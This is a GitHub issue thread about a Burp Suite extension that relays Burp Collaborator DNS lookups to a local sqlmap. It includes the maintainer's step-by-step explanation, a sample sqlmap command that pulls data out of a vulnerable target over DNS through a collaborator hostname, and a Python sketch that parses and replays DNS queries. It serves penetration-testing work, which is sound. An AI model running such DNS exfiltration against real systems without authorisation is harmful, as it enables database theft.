Closed Hipapheralkus closed 2 years ago
Hi Andrej,
I'll try to elaborate what happens under the hood. I'll start from the second part of the README.md.
1. You open Burp on your computer and enable SqlmapDnsCollaborator.
What happens when you enable SqlmapDnsCollaborator: the extension obtains from Burp servers a Collaborator hostname (aka something like somerandomstring.burpcollaborator.net) and starts polling that specific Burp Collaborator hostname every 500ms, in order to check if the Collaborator received something from somewhere. If the Collaborator received a DNS request, the extension replicates the same exact DNS request to port 53 of localhost.
2. You run Sqlmap on your computer, which performs some SQL injection on the vulnerable target.
As shown in the extension output, you need to run sqlmap with the --dns-domain parameter, setting it with the Collaborator hostname obtained in step 1.
In this example it would be like this:
sqlmap.py -u "https://yourvulnerabletarget.com" --dns-domain=somerandomstring.burpcollaborator.net
This way, 2 things will happen:
3. Vulnerable target sends DNS requests to Burp Collaborator containing interesting data.
Nothing to say here, I already explained it in step 2.
4. SqlmapDnsCollaborator reads DNS requests from Burp Collaborator and sends them to Sqlmap.
As described in step 1, the extension every 500ms detects if the Collaborator received DNS requests and forwards them to port 53 of localhost - which is where Sqlmap is listening.
5. DNS requests are interpreted by Sqlmap.
Sqlmap receives a DNS request from the extension, which is a replica of what the vulnerable target sent to the Collaborator. And Sqlmap does what it has to do with the DNS request.
If you have any further question, I'm more than happy to answer.
Cheers
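To make steps 1 and 5 concrete, here is an added Python sketch (not the extension's or sqlmap's code) of what the replicated DNS request contains: it encodes a query the way the target would send it, reads the queried name back out of the raw packet, splits off the labels that sit in front of the --dns-domain suffix, and replays the bytes to UDP port 53 on localhost the way the extension does. The payload labels `c0ffee.1` and all function names are constructed for illustration; sqlmap's real label encoding is not reproduced here.

```python
import socket
import struct
from typing import List, Optional

def build_query(qname: str, txid: int = 0x1234) -> bytes:
    """Encode a minimal DNS A query (RFC 1035 wire format) for qname."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, 1 question
    labels = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in qname.rstrip(".").split(".")
    )
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN

def parse_qname(packet: bytes) -> str:
    """Walk the label sequence of the first question and return the dotted name."""
    pos, labels = 12, []  # question section starts right after the 12-byte header
    while True:
        length = packet[pos]
        if length == 0:
            break
        if length & 0xC0:  # compression pointer: not valid in a plain query's question
            raise ValueError("compressed QNAME in question section")
        pos += 1
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    return ".".join(labels)

def payload_labels(qname: str, dns_domain: str) -> Optional[List[str]]:
    """Return the labels prepended to the --dns-domain suffix, or None if the query is unrelated."""
    suffix = "." + dns_domain.lower().rstrip(".")
    name = qname.lower().rstrip(".")
    if not name.endswith(suffix):
        return None
    return name[: -len(suffix)].split(".")

def forward_to_local_sqlmap(packet: bytes, port: int = 53) -> int:
    """Replay the captured query byte-for-byte to UDP port 53 on localhost, as the extension does."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        return sock.sendto(packet, ("127.0.0.1", port))

if __name__ == "__main__":
    # Constructed sample: a query the target might send under the Collaborator hostname.
    pkt = build_query("c0ffee.1.somerandomstring.burpcollaborator.net")
    print(parse_qname(pkt), payload_labels(parse_qname(pkt), "somerandomstring.burpcollaborator.net"))
```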
Now I'm seeing what I've missed. It was the Extension Output in the Extender tab. I was searching for a new tab, or a new menu, or some documentation explaining how to tie it together, but I've missed the --dns-domain=somerandomstring.burpcollaborator.net
entirely. Thanks for the help, maybe you could put this information in the official description for other people as well :) Great extension, I'm going to try it right away!
I am receiving connection timed out, however I am running sqlmap from another machine. The queries are showing up fine in the Extender UI output, but it is showing as failing on sqlmap due to timeout. Does it need to be run from the same machine as Burp Pro?
Hi Malpais, Sqlmap needs to run on the same machine as Burp Pro
Could you please put up a short video or GIF on how it is supposed to work? Because how will SQLmap know to use some Collaborator strings? I mean it is a separate process, and if I don't route SQLmap traffic through Burp Suite, how will SqlmapDnsCollaborator know what/how to do? I guess I have a hard time believing something works so well and easily out of the box with no setup :-D Or describe the process in the background of how it works in a little bit more detail. Thanks :)